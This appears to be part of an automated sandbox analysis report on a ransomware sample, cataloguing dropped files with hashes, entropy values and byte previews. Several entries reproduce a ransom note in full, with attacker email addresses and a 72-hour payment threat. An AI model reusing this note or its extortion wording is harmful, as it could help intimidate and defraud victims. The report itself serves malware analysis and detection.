                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.17890133751183
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:qMkvCXTN/wgVaMF2b5tOhZmKQC2KVDDcuM:qMkvCjN/paq2bfAmD5CdM
                                                                                                                                              MD5:FBC2C06353F6C79365B5209F6AC151A4
                                                                                                                                              SHA1:9EF1CBD5512BE2DD17640C4AA9F682394F5C0F42
                                                                                                                                              SHA-256:7C7961992A40A1C5B83DC66497CD4D798C4FF53CA6C0A46321712D68444A0C54
                                                                                                                                              SHA-512:0835C6CB38399AAE5C4DDED2516C8B21014491CF3689CAADFA71872869A102D3317BD409B76A23DF4FBEEC4299D7588F2A340A0711D5E3D0BFC45D490B16F7E3
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..tt.).a.L...$mc.f.Xl..4..W...T...rCm.e4}WH..m.I`...}.f~.SB.@......... ..8...O.....u....$..FT.,....@.....kUV^..c.........J...G.F...9Dd....a0...&,.:...-..u.k.h-X....5RN..M..[op.*..u..._...V....a....w...hO......Cj. ...S.,.m...6.t.U....E..G......>..W_.....K......X..N0J{...R.....aQ....r......pP.+u.e......B...R.....L.d1O....U._....#..D..Kx.`....g....b..h...'.auy...Ja..._+.i....gu.6...:....x~9..L...q\......$@S.?.k".L....Y..@C.PK...y.c.a.6.{..9.9...D.....ZC.]Gd.}....=nF#....7.gp...a.Z..N...;...c...J..D.._wO|..././..(2......)k..?.y?.1...Q.'tZ..St.0.3.It} ......je......5eZ.J/.!..m..tzR,.G....M.;.EX..TY.."....HFP.Gs.t.lN..Uh.o....i...P..;.On\..DO...Y....<Y.(.Am{.....i..m.iex.<X...h,.A9.]Q.....nW]Y.\......4.J.....\..8...AO>H......bJ.`b.b.T....g.).&....T...Oen.s...<..r.z..(pG|..s.S...d...xtVRa..5.n.CI)BT......7.;.....j..%.........h4....s8......>.. .K...V......"...W.1.....r...... ..,J.6Y1....v.?y..R.KT..@..h[d:.....p.t.'2....x....m.....T.N.....hX.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.608329755115717
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:m5HjjYSVUIyBkmwAicXfrT1vbzVX67UMOIASL/bPTeTangX8dVf:cHjsUVymmKYX1vbgpASLjCTanjdN
                                                                                                                                              MD5:590AA234ECB2800D9C7AFD81EFCF2044
                                                                                                                                              SHA1:3C76F409B534181F49C73F78F3D543D6EB0C297E
                                                                                                                                              SHA-256:4C439E375C4202F098609ABA4CBDF992E8225A3C4A6671A8568928014B08058C
                                                                                                                                              SHA-512:6484F978F6CA33224AE523959A596BDAC51F3A40EFC585BBD8C7D9D35D6BFEE4137C7BACD59036AB619D1BCB8176A0CE7F4C90BB1077188CF8E45FCA44DB4B79
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:s.......e<.|....B.......DC.H/......~mv.e.).Nv.'.rx.S...f.7>s.n%........(....".......{.p.l...'.8..d6N.N`..`...Z.n.<..L:.8..U.....a.d......{%.+w>.L..z%c.u....beL,..X....e.].#.l.*6c0d......*.XK.6U=U.-...7.....k.'..N.8.....t....I.C.a..*.c..T...m#...M..I74.....m.........Rm.C..Pv..q?..c.G`..u.a..^.....mBl(.KTDT..f...)........$.....O}nZ.+.......-<.Q..U+^.....HP....-!/...h..._...xQ.:`O.B...|..hK\.\F..^..0.8z..Zg.v.. .CN....K........z.k..c.6.P.6..U.;.2...=F....jauC........h.3..>..!.....h...2m(....T...o..?.v.o...4...$K..o.F.I.w+.;@7|r...q.lr:.g..U.....<zba......}....8..{..:c<"s&.o.1G..D\..&"....~.5........ .h*.....v...#....5.W.a{H.5..u....NZD>[......0......$k......#.....)L...L...yG.T.;5..../.X./^m.;Sp.n.d.....PW.8.U........DuI..G\^....,ZY:.9....l..........}&/.......".R>..?)...R..\Z..$.G..S.b...@?..@).N.#j..!-.o9.7@.....q...ju=R`I... ,!..B../.v.....v..1.`X.}.do?...+...........:=..u@9.....q#.(.%../_.Bs....~...h.7........Ef.?.TYOa$....*.#....m..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.608329755115717
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:m5HjjYSVUIyBkmwAicXfrT1vbzVX67UMOIASL/bPTeTangX8dVf:cHjsUVymmKYX1vbgpASLjCTanjdN
                                                                                                                                              MD5:590AA234ECB2800D9C7AFD81EFCF2044
                                                                                                                                              SHA1:3C76F409B534181F49C73F78F3D543D6EB0C297E
                                                                                                                                              SHA-256:4C439E375C4202F098609ABA4CBDF992E8225A3C4A6671A8568928014B08058C
                                                                                                                                              SHA-512:6484F978F6CA33224AE523959A596BDAC51F3A40EFC585BBD8C7D9D35D6BFEE4137C7BACD59036AB619D1BCB8176A0CE7F4C90BB1077188CF8E45FCA44DB4B79
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:s.......e<.|....B.......DC.H/......~mv.e.).Nv.'.rx.S...f.7>s.n%........(....".......{.p.l...'.8..d6N.N`..`...Z.n.<..L:.8..U.....a.d......{%.+w>.L..z%c.u....beL,..X....e.].#.l.*6c0d......*.XK.6U=U.-...7.....k.'..N.8.....t....I.C.a..*.c..T...m#...M..I74.....m.........Rm.C..Pv..q?..c.G`..u.a..^.....mBl(.KTDT..f...)........$.....O}nZ.+.......-<.Q..U+^.....HP....-!/...h..._...xQ.:`O.B...|..hK\.\F..^..0.8z..Zg.v.. .CN....K........z.k..c.6.P.6..U.;.2...=F....jauC........h.3..>..!.....h...2m(....T...o..?.v.o...4...$K..o.F.I.w+.;@7|r...q.lr:.g..U.....<zba......}....8..{..:c<"s&.o.1G..D\..&"....~.5........ .h*.....v...#....5.W.a{H.5..u....NZD>[......0......$k......#.....)L...L...yG.T.;5..../.X./^m.;Sp.n.d.....PW.8.U........DuI..G\^....,ZY:.9....l..........}&/.......".R>..?)...R..\Z..$.G..S.b...@?..@).N.#j..!-.o9.7@.....q...ju=R`I... ,!..B../.v.....v..1.`X.}.do?...+...........:=..u@9.....q#.(.%../_.Bs....~...h.7........Ef.?.TYOa$....*.#....m..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.248361814161108
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:n8RZNHdsRVhRNy/pSkic2tovE02OEw2aEDnp/Ss2UDH6rgl2n:87N9sjHAhS3c7vE0p217plDH0G2n
                                                                                                                                              MD5:05D8AD3879E3566B0194D9F093B3D594
                                                                                                                                              SHA1:653B52D58A1DD81B48C9C206E222337849E7E45F
                                                                                                                                              SHA-256:3E9208589AC34DDA44BA6B1AA71D217C556BC7742DF4318E2AD0562E8363134A
                                                                                                                                              SHA-512:CF046E660C9CB646732BA3C547D68E858F25559CA8C723B6CC245A7539026E86DACE0AD9B7299D800D5BBBD7A58435CEA55298E01A3C399F8CD05B6BCA4EFE7F
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..#..jt,x.....9...........DI.-j...>...d..Xy.......ah.....[T......[.o[..^..?FN...8D..;6.*....Z9u.......7.c_..j.|.e....s.V.W..i......Q.o..\..*.a....Q..+3.....`c.....{..2|.d$...Q...5.).1..A..I....HX^;...Uh....F....q..X.N.......3.. .......&.../.3yi..<.8..`..... ..?H.._..4..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.17890133751183
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:qMkvCXTN/wgVaMF2b5tOhZmKQC2KVDDcuM:qMkvCjN/paq2bfAmD5CdM
                                                                                                                                              MD5:FBC2C06353F6C79365B5209F6AC151A4
                                                                                                                                              SHA1:9EF1CBD5512BE2DD17640C4AA9F682394F5C0F42
                                                                                                                                              SHA-256:7C7961992A40A1C5B83DC66497CD4D798C4FF53CA6C0A46321712D68444A0C54
                                                                                                                                              SHA-512:0835C6CB38399AAE5C4DDED2516C8B21014491CF3689CAADFA71872869A102D3317BD409B76A23DF4FBEEC4299D7588F2A340A0711D5E3D0BFC45D490B16F7E3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..tt.).a.L...$mc.f.Xl..4..W...T...rCm.e4}WH..m.I`...}.f~.SB.@......... ..8...O.....u....$..FT.,....@.....kUV^..c.........J...G.F...9Dd....a0...&,.:...-..u.k.h-X....5RN..M..[op.*..u..._...V....a....w...hO......Cj. ...S.,.m...6.t.U....E..G......>..W_.....K......X..N0J{...R.....aQ....r......pP.+u.e......B...R.....L.d1O....U._....#..D..Kx.`....g....b..h...'.auy...Ja..._+.i....gu.6...:....x~9..L...q\......$@S.?.k".L....Y..@C.PK...y.c.a.6.{..9.9...D.....ZC.]Gd.}....=nF#....7.gp...a.Z..N...;...c...J..D.._wO|..././..(2......)k..?.y?.1...Q.'tZ..St.0.3.It} ......je......5eZ.J/.!..m..tzR,.G....M.;.EX..TY.."....HFP.Gs.t.lN..Uh.o....i...P..;.On\..DO...Y....<Y.(.Am{.....i..m.iex.<X...h,.A9.]Q.....nW]Y.\......4.J.....\..8...AO>H......bJ.`b.b.T....g.).&....T...Oen.s...<..r.z..(pG|..s.S...d...xtVRa..5.n.CI)BT......7.;.....j..%.........h4....s8......>.. .K...V......"...W.1.....r...... ..,J.6Y1....v.?y..R.KT..@..h[d:.....p.t.'2....x....m.....T.N.....hX.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1547372592565357
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:hyiCBvlY9EjOWhIcDk0SBkV3kwxor8d635flGSyStBKHv36rL:hy3Y9EvhIB0SWJo48saB6v36P
                                                                                                                                              MD5:4C1DC852AF4253672ABBAA9D6ECCF95E
                                                                                                                                              SHA1:52D06ED0705F6AECDB9B7306630FF7B563ADA5D4
                                                                                                                                              SHA-256:7C2FB22F20C15BCB9002D93B5B1FBB199A81F78E3B8927A6381B0DC3A244A372
                                                                                                                                              SHA-512:FF52E8A64010F0B5D6DB7DE9492E9415B302BEF695399673A9D2010335C910005A4E692536FCEA2934DC497321E5E9FC4A174615263B3B156A6052F9AFCD1A37
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.Z.....a..K......T.....A....UH. EhJ.....R..q2'.3.p..q..i.P.d.2........-...9:'H....h...=.AO.[.V.L.vo..k.....;.'.cE....V..F/..:.HY;.%."+bp?..t.....RB.../.bd.{.Y.x..D3r.6`q:..J.9.............Z.n.J.A.+d.w...`.Lm5H...'_.....*....[.pu.................k@5..s...g`.K.7{b.z...8.me.`...:L...;.%':.....5Z..J.K...q=.w...5.v..2...+.M@..%...\\?C$..g.b...R_...H.(.0 .....F.`.K.1.z.2.K..........7.....O-....Y4|.r...l.'4......5...&.........v..4!.P.V.....~g...C....5.Y...Nmb.L.}...>2m.....1K8T....>.R.p..T?.`&qf...(..J...C..z_.7.u........r......;.'....9.I0.M....J`...e.1...b..owK......-...$2-.(7E....t.....F..k.;..N.m....*.<..aS)HGC.t.'~......\.h..(.(.....!U..s.........s..L..j......'...i..V..G..J.<4Rs.[E...c.h.p0.$s.9.3L.Ze.b9X1.V5.}...hG.....c7......./M.fI.9.1...a....&Z.f.&i....<.._.-....G...>......S8........>`.|t..P..p...."\...s,l..X..= BuT.........G.S.^]aK..o+.<$Y].T$..!}.c..Sv0.Sk.:.. "....sM..j.Y......U..A./O...v...f.,....z...Z.`..4.\D...L.R,..w. .N.g...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6082481690946078
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ieTD/gdYHsAQLbYBl3mEFGfZ8xcKTtA4K8JJtWpwXOOO5:LTD/geMbYBUR8TtnVnWqXG
                                                                                                                                              MD5:4E9CF9FBD6B0FA101A9519EDB83CB899
                                                                                                                                              SHA1:476E45568DA1FDB9070487511BECDAC2FA04CB58
                                                                                                                                              SHA-256:872161DA153E1A7E8E06607C8E18C10C69119195E55F93C78119BCB96A7BE03A
                                                                                                                                              SHA-512:D75E3545E75BED17A31377C2D99A18B62DFF7D2FFAA58EC88B74C50928F5F0AAD2397DF3802FA7012FCE64CE2998208D46E044B56FF517635CBF0FEF96CE7F60
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.....-.G.U}....,h..N..2.}q.....\9.`q..iRN.7C..x...4$.AY5.q....=J..+.y....4.s....;..*.2.?.W......D.~.......k....v}..p..........-.Ptn..tR....$....1b.$.L\yc.....L.#.Q[...Q...Y.....P.=*_\..k[l..9b..........i-..*C...+a4.=.N.<...m....5..B.T.....|h6..N'>..u}..X74y2)[f....{......{.......k._.hos.I..n.f.;.X.4......bMyA=a... .W.........LQ.).H.p.L.J...9(6..,..A.L0(./O..\!ePe....D..x{8.j.8....Xe.l.9.."re.v.oPe%..|5......D..]y.&.h..)...........0....gd.L..7Zh..r.XyV.muQ.D.ZDc....|.Tc%.W..c.C..mePW....".>...8..m...1a[....8z..:......E..@....2..s...<l6.T..N.....3w......pc.>.625[...$NVm:..ckB:-Fv.L.Ut.....c/b.......F./..0a..#c.].$..FdW..9..5..].....|.{....@o....BZ.;......#..N(...}K)o... .U....|.g..Yu.....[dP...S.U\y.....|...X%.).\._.Q.....".S.(....AM..1...........4.&....R..O.y.....R.0...0....p.'u~m#B=#...r%.....R.a.uV."n...0!T.9.6P.L...].....4..H+.\.q,...x.e.r.m`:aL.q.E..;...'....<...h..xI.|....[...R.\.|L^........ .s......H.`.....%.|.0.#..!.....q..5q...W.....n....t)
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6082481690946078
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ieTD/gdYHsAQLbYBl3mEFGfZ8xcKTtA4K8JJtWpwXOOO5:LTD/geMbYBUR8TtnVnWqXG
                                                                                                                                              MD5:4E9CF9FBD6B0FA101A9519EDB83CB899
                                                                                                                                              SHA1:476E45568DA1FDB9070487511BECDAC2FA04CB58
                                                                                                                                              SHA-256:872161DA153E1A7E8E06607C8E18C10C69119195E55F93C78119BCB96A7BE03A
                                                                                                                                              SHA-512:D75E3545E75BED17A31377C2D99A18B62DFF7D2FFAA58EC88B74C50928F5F0AAD2397DF3802FA7012FCE64CE2998208D46E044B56FF517635CBF0FEF96CE7F60
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....-.G.U}....,h..N..2.}q.....\9.`q..iRN.7C..x...4$.AY5.q....=J..+.y....4.s....;..*.2.?.W......D.~.......k....v}..p..........-.Ptn..tR....$....1b.$.L\yc.....L.#.Q[...Q...Y.....P.=*_\..k[l..9b..........i-..*C...+a4.=.N.<...m....5..B.T.....|h6..N'>..u}..X74y2)[f....{......{.......k._.hos.I..n.f.;.X.4......bMyA=a... .W.........LQ.).H.p.L.J...9(6..,..A.L0(./O..\!ePe....D..x{8.j.8....Xe.l.9.."re.v.oPe%..|5......D..]y.&.h..)...........0....gd.L..7Zh..r.XyV.muQ.D.ZDc....|.Tc%.W..c.C..mePW....".>...8..m...1a[....8z..:......E..@....2..s...<l6.T..N.....3w......pc.>.625[...$NVm:..ckB:-Fv.L.Ut.....c/b.......F./..0a..#c.].$..FdW..9..5..].....|.{....@o....BZ.;......#..N(...}K)o... .U....|.g..Yu.....[dP...S.U\y.....|...X%.).\._.Q.....".S.(....AM..1...........4.&....R..O.y.....R.0...0....p.'u~m#B=#...r%.....R.a.uV."n...0!T.9.6P.L...].....4..H+.\.q,...x.e.r.m`:aL.q.E..;...'....<...h..xI.|....[...R.\.|L^........ .s......H.`.....%.|.0.#..!.....q..5q...W.....n....t)
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.095591593726329
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:t6k/1AD81maFfbyTl9rB0yJWHO2dN6tPk+Hn:peD8YqStJWHRytln
                                                                                                                                              MD5:D538079813AA7F6B5B2E831844E46EFF
                                                                                                                                              SHA1:5320A91B2819B8B79B32B19A2A4D1C049CC5DD83
                                                                                                                                              SHA-256:681BE1A754F098D8475B6C3DC434FA56F88F83800A7DB3074A38A0C3B3354C20
                                                                                                                                              SHA-512:CE766EEBF7E817A2EC45B48BDE7D3C918C54B74ED30D120E08735B209D1973CC2F0E54452C8DA0BA06F44BC88F32F7466A708C369E677B42415E128D2DBA5D59
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.t.8z .!.8d..~0...........r.c....?j..%..*."l.T......."o......R.6....qm.j.W{,&..D4..../..K.!...:69B...'.MKd..mK...c.=....*Z]...3.n..Gw.c.1....A0.W.b.6..q9@. ."w.qpS....|..8..n.>4.EZ.....zn...Hf....8.|s..V)N>Bk....j/......Y..E..t..d...........u..$H$4.s...>..T.].K.,.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49418
                                                                                                                                              Entropy (8bit):1.1547372592565357
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:hyiCBvlY9EjOWhIcDk0SBkV3kwxor8d635flGSyStBKHv36rL:hy3Y9EvhIB0SWJo48saB6v36P
                                                                                                                                              MD5:4C1DC852AF4253672ABBAA9D6ECCF95E
                                                                                                                                              SHA1:52D06ED0705F6AECDB9B7306630FF7B563ADA5D4
                                                                                                                                              SHA-256:7C2FB22F20C15BCB9002D93B5B1FBB199A81F78E3B8927A6381B0DC3A244A372
                                                                                                                                              SHA-512:FF52E8A64010F0B5D6DB7DE9492E9415B302BEF695399673A9D2010335C910005A4E692536FCEA2934DC497321E5E9FC4A174615263B3B156A6052F9AFCD1A37
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.Z.....a..K......T.....A....UH. EhJ.....R..q2'.3.p..q..i.P.d.2........-...9:'H....h...=.AO.[.V.L.vo..k.....;.'.cE....V..F/..:.HY;.%."+bp?..t.....RB.../.bd.{.Y.x..D3r.6`q:..J.9.............Z.n.J.A.+d.w...`.Lm5H...'_.....*....[.pu.................k@5..s...g`.K.7{b.z...8.me.`...:L...;.%':.....5Z..J.K...q=.w...5.v..2...+.M@..%...\\?C$..g.b...R_...H.(.0 .....F.`.K.1.z.2.K..........7.....O-....Y4|.r...l.'4......5...&.........v..4!.P.V.....~g...C....5.Y...Nmb.L.}...>2m.....1K8T....>.R.p..T?.`&qf...(..J...C..z_.7.u........r......;.'....9.I0.M....J`...e.1...b..owK......-...$2-.(7E....t.....F..k.;..N.m....*.<..aS)HGC.t.'~......\.h..(.(.....!U..s.........s..L..j......'...i..V..G..J.<4Rs.[E...c.h.p0.$s.9.3L.Ze.b9X1.V5.}...hG.....c7......./M.fI.9.1...a....&Z.f.&i....<.._.-....G...>......S8........>`.|t..P..p...."\...s,l..X..= BuT.........G.S.^]aK..o+.<$Y].T$..!}.c..Sv0.Sk.:.. "....sM..j.Y......U..A./O...v...f.,....z...Z.`..4.\D...L.R,..w. .N.g...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):532746
                                                                                                                                              Entropy (8bit):4.257141676348833
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:XgO5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7a:XgO+cEJi6iEwyN8jTNkDKeYa
                                                                                                                                              MD5:9595B3D41A027F847F08E74BE6C2D729
                                                                                                                                              SHA1:1CF9E577134759EA4519A1660668DC1ADF3215EA
                                                                                                                                              SHA-256:E139342FB5E5B4CC15B66688E406FFCB1B80BAAB344E60A146581E6422EEF2BA
                                                                                                                                              SHA-512:38ED8377F67CE51E3086C31E7713D63029C3954D7BF7CA575A7AA54ED0B5BF7578ECD267D6697E140BF9EC07CE3E65FCFF9343306A0D54575C1E5ECF8071525B
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.7o.......Q.=...)...r.._.|`..Y./....h..."..d;\.mT..6.4..%<...Q...*.. 1.oJ......Dc\7<.!.3`.q.em ....sx..%v..w=..E.3...7..h...N.D..O.|(".j.t+6...CT;..J.2M@.lf.........Zz:.......w.e..@...G.k.....D.._.t.&........{.9..0.......if^..K........x....X.q.....p2.8..R*.^.G..:..A..<.P...O..;.k.1..:r.}.5A..o...:...>"O..<r...pE.......<...y.l mmb;m.VGN..X.........TN.Y.G.q.:.m....C..m.#%.@.d-...QH..E.B...a.P.Va{,.\..D{...M..].B.....l..p.:....... .....Y..._t.Y.&O...4.pS..."..a....1.k.....a.u.m...y.H.. .3/......f....v........$..NR^.1 .O.<.A......~..1,.Ju.k........b6...N....Xf.,.....}.f.D..h....}EpBI~..4...s...G. .l...'...`.=...D....:....m.......M.?.S..F.Nc....b.&.. ..J..$..X...=..y...7...D.....p.~|.0?....~{Rz1....*JL.ezM..G.6...D....y-|wH{)TPN.?.p.9!-.-.......l....U.s......m.M........4w2.J......jQ?.m..~9v..Kj.I.,r..5.J..v......=...Fx....Z(.r...#.../......(...Zgj,.X...I..."....b3.*.p....{.B.........>y0...>FJ.S..x..3.l>......K..M..l.p.H..@-.l.y.....Us..31....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):33034
                                                                                                                                              Entropy (8bit):1.6547031492485456
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ZpefhZt6oTk40IfDWUQmwRLpx7B0SDLdOdXv26G43bMzvyn1LPZgZX73O:ZpA/n/JfD0R1lBZUdFD3bM41+5K
                                                                                                                                              MD5:856BDCB76A6C4273BEFCED308758EE6E
                                                                                                                                              SHA1:79C60DEF22C27A39F2A35536DBEAC9A2D5807FE5
                                                                                                                                              SHA-256:F90F1459397AE54189227A390415EDF1F007FD7A94623BF420EF9D5A89A3267F
                                                                                                                                              SHA-512:CDA89ECE3C6CF587A64B81927EBE3D3A31438CDFAC646479FC61E92D0D2ABD95A52BACAE7EA8E49B9F1E217E794DAF2BC735046A26477AC909575F8F29FE6726
                                                                                                                                              Malicious:true
